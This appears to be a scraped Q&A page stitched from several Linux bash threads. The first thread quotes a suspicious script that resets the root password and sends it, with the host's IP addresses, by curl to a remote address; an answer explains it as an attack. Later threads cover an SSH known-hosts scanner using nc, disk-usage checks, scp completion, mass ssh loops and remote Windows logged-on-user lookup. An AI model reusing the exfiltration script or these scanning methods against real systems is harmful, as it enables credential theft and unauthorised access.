Is the attached script an attept to crack passwords? - linux

I found this entry in my crontab:
##reboot /usr/local/bin/email_passwordscript.sh
Although it is commented out, it worried me so I looked for this script in /usr/local/bin. I found the following script in my folder, but interestingly with a different name (set_password.sh):
#!/bin/sh
PASSWORD=$1
if [ "$#" -eq 0 ]; then
IPS=$(hostname -I)
PASSWORD=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 12)
IPS=$(echo $IPS | sed 's/ /%20/g')
OLD_PASSWORD=1
fi
echo "PASSWORD IS $PASSWORD" >> /var/log/new_passwordscript.log
echo "root:$PASSWORD" | chpasswd
hostname_str=`hostname`
sed -i "s/%HOSTNAME%/$hostname_str/" /etc/zabbix/zabbix_agentd.conf
if [ $OLD_PASSWORD == 1 ]; then
curl -X GET "http://172.16.98.14:8887/passwordemailservice?ip=$IPS&password=$PASSWORD" >> /var/lo
g/passwordscript.log
fi
Is this an attempt to hack my machine? If so, can anyone offer clues on how this has happened? It appears to be someone on my local network, but that IP address does not provide any clues i.e. there is no response.

This code seems dangerous.
The code changes the root password of a machine and sends the IP address of the machine along with its password to a remote computer.
How it works:
PASSWORD=$1
Assigns the first argument in the call to password
if [ "$#" -eq 0 ];
IPS=$(hostname -I)
PASSWORD=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 12)
IPS=$(echo $IPS | sed 's/ /%20/g')
OLD_PASSWORD=1
fi
Checks to see if there is an argument e.g ./email_passwordscript.sh XXX. If there isn't one it will generate a random password.
echo "root:$PASSWORD" | chpasswd
This line changes the password
curl -X GET "http://172.16.98.14:8887/passwordemailservice?ip=$IPS&password=$PASSWORD"
Sends the password to a remote server.
How Did it happen?
This is difficult to answer as there are many ways this script could have gotten on to your computer such as:
Someone having physical access to your machine
Unintentionally installing malicious software

Related

Testing active ssh keys on the local network

I am trying currently to achieve a bash script that will validate if SSH keys on a server are still linked to known hosts that are active on the local area network. You can find below the beginning of my bash script to achieve this:
#!/bin/bash
# LAN SSH KEYS DISCOVERY SCRIPT
# TRYING TO FIND THOSE SSH KEYS NOW
cat /etc/passwd | grep /bin/bash > bash_users
cat bash_users | cut -d ":" -f 6 > cutted.bash_users_home_dir
for bash_users in $(cat cutted.bash_users_home_dir)
do
ls -al $bash_users/.ssh/*id_* >> ssh-keys.txt
done
# DISCOVERING THE KNOWN_HOSTS NOW
for known_hosts in $(cat cutted.bash_users_home_dir)
do
cat $bash_users/.ssh/known_hosts | awk '{print $1}' | sort -u >>
hosts_known.txt
sleep 2
done
hosts_known=$(wc -l hosts_known.txt)
echo "We have $hosts_known known hosts that could be still active via SSH
keys"
# TIME TO TEST WHICH SSH servers are still active with the SSH keys
# AND THIS IS WHERE I AM FROZEN...
# Would love to have bash script that could
# ssh -l $users_that_have_/bin/bash -i $ssh_keys $ssh_servers
# Would also be very nice if it could save active
# SSH servers with the valid keys in output.txt in the format
# username:local-IP:/path/to/SSH_key
Please feel very comfortable to edit/modify the bash script above if it can serve better the goals described.
Any help would be very appreciated,
Thanks
The following works cool:
</etc/passwd \
grep /bin/bash |
cut -d: -f6 |
sudo xargs -i -- sh -c '
[ -e "$1" ] && cat "$1"
' -- {}/.ssh/known_hosts |
cut -d' ' -f1 |
tr ',' '\n' |
sed '
/^\[/{
s/\[\(.*\)\]:\(.*\)/\1 \2/;
t;
};
s/$/ 22/;
' |
sort -u |
xargs -l1 -- sh -c '
if echo "~" | nc -q1 -w3 "$1" "$2" | grep -q "^SSH"; then
echo "#### SUCCESS $1 $2";
else
echo "#### ERROR $1 $2";
fi
' --
So:
Start with /etc/passwd
Filter all "bash_users" as you call them
Filter user home directories only cut -d: -f6
For each user home directory sudo xargs -i -- run
Check if the file .ssh/known_hosts inside the user home directory exists
If it does, print it
Filter only hosts names
Multiple hosts signatures may share same key and are separated by a comma. Replace comma for newline
Now a sed script:
If a line starts with a [ that means it has a format of [host]:port and I want to replace it with host port
If the line does not start with a [ I add 22 to the end of the line so it's host 22
Then I sort -u
Now for each line:
I get the ssh version from ssh echo "~" | nc hostname port returns smth like "SSH-2.0-OpenSSH_6.0" + newline + "Protocol mismatch".
So if the line returned by nc hostname port starts with SSH that means there is ssh running on the other side
I added timeout for unresponsive hosts, but I think nc -w timeout option may also be used. Probably also nc -q 1 should be specified.
Now the real fun is, when you add the max-procs option to the last xargs line, you can check all hosts simultaneously. On my host I have 47 unique addresses and xargs -P30 checks them ALL in like 2 seconds.
But really there are some problems. The script needs root to read from all users known_hosts. But worse, the known_hosts may be hashed. It would be better to firstly know the list of hosts on your network, and then generate known_hosts from it. It would look like ssh-keyscan -f list_of_hosts > ~/.ssh/known_hosts or similar. Generaly ssh-keygen -F hostname should be used if a host exists in known_hosts, sadly there is no listing command. known_hosts file format may be found in ssh documentation.

Bash script to find filesystem usage

EDIT: Working script below
I have used this site MANY times to get answers, but I am a little stumped with this.
I am tasked with writing a script, in bash, to log into roughly 2000 Unix servers (Solaris, AIX, Linux) and check the size of OS filesystems, most notable /var /usr /opt.
I have set some variables, which may be where I am going wrong right off the bat.
1.) First I am connecting to another server that has a list of all hosts in the infrastructure. Then I parse this data with some sed commands to get a list I can use properly
1.) Then I do a ping test, to see if the server is alive. If the server is decom. The idea behind this, is if the server is not pingable, I don't want it being reported on, or any attempt to be made to connect to it, as it is just wasting time. I feel I am doing this wrong, but don't know how to do it corectly (a re-occurring theme you will here in this post lol)
If any FS is over 80% mark, then it should output to a text file with the servername, filesystem, size on one line <== very important for me
If the FS is under 80% full, then I don't want it in my output, it can me omitted completely.
I have created something that I will post below, and am hoping to get some help in figuring out where I am going wrong. I am very new to bash scripting, but have experience as a Unix admin (i have never been good at scripting).
Can anyone provide some direction and teach me where I am going wrong?
I will upload my script that i can confirm is working hopefully tomorrow. thanks everyone for your input in this!
Here is my "disk usage" linux script, i hope that help you.
#!/bin/sh
df -H | awk '{ print $5 " " $6 }' | while read output;
do
echo $output
usep=$(echo $output | awk '{ print $1}' | cut -d'%' -f1 )
partition=$(echo $output | awk '{ print $2 }' )
if [ $usep -ge 90 ]; then
echo "Running out of space \"$partition ($usep%)\" on $(hostname) as on $(date)" |
mail -s "Warning! There is no space on the disk: $usep%" root#domain.com
fi
done
Some trouble is here:
ping -c 1 -W 3 $i > /dev/null 2>&1
if [ $? -ne 0 ]; then
echo "$i is offline" >> $LOG
fi
You need a continue statement inside that if. Your program isn't really treating non-pingable hosts differently, just logging they're not pingable.
Okay, now I'm looking a little deeper, and there's more naive stuff in here. These shouldn't work:
SOLVARFS=$(df -h /var |cut -f5 |grep -v capacity |awk '{print $5}')
SOLUSRFS=$(df -h /usr |cut -f5 |grep -v capacity |awk '{print $5}')
SOLOPTFS=$(df -h /opt |cut -f5 |grep -v capacity |awk '{print $5}')
etc...
The problem with these lines is, the command substitution gets assigned to the variables before the ssh session happens. So the content of each variable is the command's result on your local system, not the command itself. Since you're doing command substitution around your ssh calls, it might well work just to rewrite these lines as (note the backslash escapes on $5):
SOLVARFS="df -h /var |cut -f5 |grep -v capacity |awk '{print \$5}'"
SOLUSRFS="df -h /usr |cut -f5 |grep -v capacity |awk '{print \$5}'"
SOLOPTFS="df -h /opt |cut -f5 |grep -v capacity |awk '{print \$5}'"
etc...
The part where you're contacting another server has some more stuff to correct. You don't need three if statements per server, and there's no reason to echo anything to /dev/null. Here's a rewrite for the SunOS section. For each directory you're checking, it outputs the host name, the command name (so you can see which dir was being checked), and the result:
if [[ $UNAME = "SunOS" ]]; then
for SSH_COMMAND in SOLVARFS SOLUSRFS SOLOPTFS ; do
RESULT=`ssh -o PasswordAuthentication=no -o BatchMode=yes -o StrictHostKeyChecking=no -o ConnectTimeout=2 GSSAPIAuthentication=no -q $i ${!SSH_COMMAND}`
if ["$RESULT" -gt 80] ; do
echo "$i, $SSH_COMMAND, $RESULT" >> $LOG
fi
done
fi
Note that the ${!BLAH} construction is variable indirection. "Give me the contents of the variable named by BLAH".
Your original script does a bunch of things less-than-optimally. Rather than running an almost-identical block of code for each filesystem and each operating system, the thing to do would be to record the differences in a way that a SINGLE piece of code can iterate over all your objects, adapting as required.
Here's my take on this. Commands should appear ONCE, but
they get run multiple times by loops, and
they get run multiple ways using arrays.
The following script passes lint checks, but obviously this is untested, as I don't have your environment to test in.
You might still want to think about how your logging and notifications work.
#!/bin/bash
# Assign temp file, remove it automatically upon successful exit.
tmpfile=$(mktemp /tmp/${0##*/}.XXXX)
trap "rm '$tmpfile'" 0
#NOW=$(date +"%Y-%m-%d-%T")
NOW=$(date +"%F")
LOG=/usr/scripts/disk_usage/Unix_df_issues-$NOW.txt
printf '' > "$LOG"
# Use variables to refer to commonly accessed files. If you change a name, just do it once.
rawhostlist=all_vms.txt
host_os=${rawhostlist}_OS
# Commonly-used options need only be declared once. Use an array for easier management.
declare -a ssh_opts=()
ssh_opts+=(-o PasswordAuthentication=no)
ssh_opts+=(-o BatchMode=yes)
ssh_opts+=(-o StrictHostKeyChecking=no) # Eliminate prompts on new hosts
ssh_opts+=(-o ConnectTimeout=2) # This should make your `ping` unnecessary.
ssh_opts+=(-o GSSAPIAuthentication=no) # This is default. Do we really need it?
# Note: Associative arrays require Bash 4.x.
declare -A df_opts=(
[SunOS]="-h"
[Linux]="-hP"
[AIX]=""
)
declare -A df_column=(
[SunOS]=5
[Linux]=5
[AIX]=4
)
# Fetch host list from configserver, stripping /^adm/ on the remote end.
ssh "${ssh_opts[#]}" -q configserver "sed 's/^adm//' /reports/*/HOSTNAME" > "$rawhostlist"
# Confirm that our host_os cache is up to date and process any missing hosts.
awk '
NR==FNR { h[$1]; next } # Add everything in rawhostlist to an array...
{ delete h[$1] } # Then remove any entries that exist in host_os.
END {
for (i in h) print i # And print whatever remains.
}' "$rawhostlist" "$host_os" |
while read h; do
printf '%s\t%s\n' "$h" $(ssh "$h" "${ssh_opts[#]}" -q uname -s)
done >> "$host_os"
# Next, step through the host list and collect data.
while read host os; do
ssh "${ssh_opts[#]}" "$host" df "${df_opts[$os]}" /var /usr /opt |
awk -v column="${df_column[$os]}" -v host="$host" 'NR>1 { print host,$1,$column }'
)
done < "$host_os" > "$tmpfile"
# Now that we have all our data, check for warning/critical levels.
while read host filesystem usage; do
if [ "$usage" -gt 80 ]; then
status="CRITICAL"
elif [ "$usage" -gt 70 ]; then
status="WARNING"
else
continue
fi
# Log our results to our log file, AND send them to stderr.
printf "[%s] %s: %s:%s at %d%%\n" "$(date +"%F %T")" "$status" "$host" "$filesystem" "$usage" | tee -a "$LOG" >&2
done < "$tmpfile"
# Email and record our results.
if [ -s "$LOG" ]; then
mail -s "Daily Unix /var Report - $NOW" unixsystems#examplle.com < "$LOG"
mv "$LOG" /var/log/vm_reports/
fi
Consider this example code. If you like the way it looks, your next task is to debug it, or open new questions for parts that you're having trouble debugging. :-)

scp: how to find out that copying was finished

I'm using scp command to copy file from one Linux host to another.
I run scp commend on host1 and copy file from host1 to host2. File is quite big and it takes for some time to copy it.
On host2 file appears immediately as soon as copying was started. I can do everything with this file even if copying is still in progress.
Is there any reliable way to find out if copying was finished or not on host2?
Off the top of my head, you could do something like:
touch tinyfile
scp bigfile tinyfile user#host:
Then when tinyfile appears you know that the transfer of bigfile is complete.
As pointed out in the comments, this assumes that scp will copy the files one by one, in the order specified. If you don't trust it, you could do them one by one explicitly:
scp bigfile user#host:
scp tinyfile user#host:
The disadvantage of this approach is that you would potentially have to authenticate twice. If this were an issue you could use something like ssh-agent.
On sending side (host1) use script like this:
#!/bin/bash
echo 'starting transfer'
scp FILE USER#DST_SERVER:DST_PATH
OUT=$?
if [ $OUT = 0 ]; then
echo 'transfer successful'
touch successful
scp successful USER#DST_SERVER:DST_PATH
else
echo 'transfer faild'
fi
On receiving side (host2) make script like this:
#!/bin/bash
SLEEP_TIME=30
MAX_CNT=10
CNT=0
while [[ ! -e successful && $CNT < $MAX_CNT ]]; do
((CNT++))
sleep($SLEEP_TIME);
done;
if [[ -e successful ]]; then
echo 'successful'
rm successful
# do somethning with FILE
fi
With CNT and MAX_CNT you disable endless loop (in case file successful isn't transferred).
Product MAX_CNT and SLEEP_TIME should be equal or greater expected transfer time. In my example expected transfer time is less than 300 seconds.
A checksum (md5sum, sha256sum ,sha512sum) of the local and remote files would tell you if they're identical.
For the situation where you don't have SSH access to the remote system - like an FTP server - you can download the file after it's uploaded and compare the checksums. I do this for files I send from production scripts at work. Below is a snippet from the script in which I do this.
MD5SRC=$(md5sum $LOCALFILE | cut -c 1-32)
MD5TESTFILE=$(mktemp -p /ramdisk)
curl \
-o $MD5TESTFILE \
-sS \
-u $FTPUSER:$FTPPASS \
ftp://$FTPHOST/$REMOTEFILE
MD5DST=$(md5sum $MD5TESTFILE | cut -c 1-32)
if [ "$MD5SRC" == "$MD5DST" ]
then
echo "+Local and Remote files match!"
else
echo "-Local and Remote files don't match"
fi
if you use inotify-tools,
then the solution will looks like this:
while ! inotifywait -e close $(dirname ${bigfile_fullname}) 2>/dev/null | \
grep -Eo "CLOSE $(basename ${bigfile_fullname})$">/dev/null
do true
done
echo "File ${bigfile_fullname} closed"
After some investigation, and discussion of the problem on other forums I have found one more solution. Maybe it can help somebody.
There is a command "lsof". It lists open files. During copying the file will be opened, so the command
lsof | grep filename
will return non empty result.
So you might want to make a while loop to wait until lsof returns nothing and proceed with your task.
Example:
# provide your file name here
f=<nameOfYourFile>
lsofresult=`lsof | grep $f | wc -l`
while [ $lsofresult != 0 ]; do
echo still copying file $f...
sleep 5
lsofresult=`lsof | grep $f | wc -l`
done; echo copying file $f is finished: `ls $f`
For the duplicate question, How to check if file has been scp 100% to the remote location , which was for an expect script, to know if a file is transferred completely, we can add expect 100% .. .. i.e something like this ...
expect -c "
set timeout 1
spawn scp user#$REMOTE_IP:/tmp/my.file user#$HOST_IP:/home/.
expect yes/no { send yes\r ; exp_continue }
expect password: { send $SCP_PASSWORD\r }
expect 100%
sleep 1
exit
"
if [ -f "/home/my.file" ]; then
echo "Success"
fi
If avoiding a second SSH handshake is important, you can use something like the following:
ssh host cat \> bigfile \&\& touch complete < bigfile
Then wait for the "complete" file to get created on the remote end.

Is it possible to run a script which loops through hosts with rsh/ssh

I have tried to run following csh script which ssh to all computers on our network with the purpose of yum installing software passed as arguments. However, the script fails to continue once I have rsh to another host. Is there a way around this problem?
if ($1 == "")then
echo -n "Please enter a package to install\n"
set package=$<
else set package = $#argv
endif
set numlines = `cat $NM_HOME/sh_local/nc_network2.txt | grep -v "^#" | fgrep "%" | wc -l`
while ($numlines>0)
set line = `cat $NM_HOME/sh_local/nc_network2.txt | grep -v "^#" | fgrep "%" | tail -$numlines | head -1`
set host2 = `echo $line | cut -f 1 -d %`
set where = `echo $line | cut -f 2 -d %`
if ($host2 == $this_machine) then
echo "This is $host2....skipping rsh to this machine"
echo ""
goto yum
endif
echo ""
echo "logging into $host2 $where"
echo ""
sleep 1
rsh $host2
yum:
echo ""
echo "Preparing to install $package on $host2"
sudo yum -y install $package
if ($host2 == $this_machine) then
goto decrement
else
logout
goto decrement
endif
decrement:
# numlines--
end
ssh/rsh-ing to another host does not magically continue the execution of your script on that host. Executing ssh hostname in a script has the exact same effect as executing ssh hostname in your shell — it connects to that machine, runs an interactive shell there, and leaves you in that shell. Your script execution will only continue after you close the ssh/rsh connection yourself.
In order to perform some action on that host, you need to provide an explicit command you want to run on that host, like this:
rsh $host2 sudo yum -y install $package
Note that this is only a naive example for illustration purposes; it likely won't be enough to fix the entire logic of your script, but should point you in the right direction.
YES. My answer is provided below only by reading your "Question" and not what you have put up in the code that you posted.
I have been doing this for many years as below.
create a list of hosts with onehost on each line.
enable SSH key based authentication upfront. This can be done manually but I had done it in the past using perl and expect.
run a for loop as below to perform action onall the servers:
for i in cat hosts_list; do ssh $i dmidecode | grep -m 1 'Serial Number:'; done
Above oneliner will give me the serial numbers of all the servers wic are mentioned in the host_list. This a shot example of pulling serial number. however, you can write a full fledged bash script following the exact same logic.
for more advanced requirement, consider using perl and the ssh modules that are available on CPAN

Finding authenticated Windows user remotely with Linux

I'm working on a project that needs to determine the username currently logged into a Windows workstation from a Linux client. The Linux client has the IP address / hostname of the workstation, and can potentially access the Active Directory domain controller, but has nothing else.
I understand that the "psloggedon \hostname" utility from Windows would do the job, but I'm looking for a Linux/Unix alternative.
Any suggestions?
This is the script I'm using. It requires Samba, i think at least version 3.x, it only asks for domain admin password once per run, not really secure but its better than hardcoding into the script.
#!/bin/bash
ADMIN_USER='DOMAIN_NAME\Administrator'
DOMAIN_CONTROLLER='hostname.of.domain.controller'
#
die () {
echo >&2 "$#"
exit 1
}
# Die if computer name missing
[ "$#" -eq 1 ] || die "Usage: loggedon <computer>"
COMPUTER=$1
# Store domain admin password in a variable to avoid asking every time.
read -s -p "Please provide domain administrator password: " ADMIN_PASSWORD
echo
# Store all sids logged on $COMPUTER inside an array
# Notice I'm using PASSWD= environement variable to push the admin password
# to net command, this way it won't ask for it.
#
SIDs=(`PASSWD=$ADMIN_PASSWORD /usr/bin/net rpc registry enumerate 'HKEY_USERS' -S $COMPUTER -U $ADMIN_USER | grep _Classes | cut -d '=' -f2 | sed 's/ //g'`)
if [ "${#SIDs[#]}" -gt 0 ]; then
printf "Found %s logged on $COMPUTER\n" "${SIDs[#]}"
echo
# Retrieves CommonName attribute from DC for each SID
for i in "${SIDs[#]}"
do
:
RAW_USER=`PASSWD=$ADMIN_PASSWORD net ads sid -S $DOMAIN_CONTROLLER -U Administrator $i`
#RAW_USER contains all attributes from ldap, we need to clean it first
USER=`echo $RAW_USER | egrep -o 'cn: (.+)sn:' | sed -e 's/sn\://g'`
echo "$USER is logged on $COMPUTER"
done
else
echo Nobody is logged on $COMPUTER
fi

Resources